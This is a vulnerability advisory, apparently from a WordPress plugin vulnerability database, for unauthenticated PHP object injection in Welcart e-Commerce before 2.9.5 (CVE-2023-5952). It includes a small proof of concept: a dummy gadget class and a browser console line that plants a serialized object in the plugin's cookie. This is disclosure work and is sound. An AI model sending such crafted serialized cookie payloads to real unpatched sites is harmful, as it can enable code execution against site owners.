Welcart e-Commerce < 2.9.5 – Unauthenticated PHP Object Injection | CVE 2023-5952 | Plugin Vulnerabilities

Description

The plugin unserializes user input from cookies, which could allow unautehtniacted users to perform PHP Object Injection when a suitable gadget is present on the blog

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:
class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}

Then execute the command below in the web developer console of the browser when on the blog as unauthenticated:

document.cookie='usces_cookie=O:4:"Evil":0:{}'

Refresh the page to see the 'Arbitrary deserialization' message displayed

Affects Plugins

Fixed in 2.9.5

References

CVE

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

0acd613e-dbd6-42ae-9f3d-6d6e77a4c1b7

Timeline

Publicly Published

2023-11-10 (about 6 months ago)

Added

2023-11-10 (about 6 months ago)

Last Updated

2023-11-10 (about 6 months ago)

Other

Published

Title

Published

2017-04-27

Title

AJAX Random Posts <= 0.3.3 - Unauthenticated PHP Object Injection

Published

2024-03-26

Title

Sunshine Photo Cart: Free Client Photo Galleries for Photographers < 3.1.2 - Unauthenticated PHP Object Injection

Published

2018-12-13

Title

WordPress <= 5.0 - PHP Object Injection via Meta Data

Published

2023-03-27

Title

WP Meta SEO < 4.5.5 - Author+ PHAR Deserialization

Published

2017-04-27

Title

SiteBuilder Dynamic Components <= 1.0 - Unauthenticated PHP Object Injection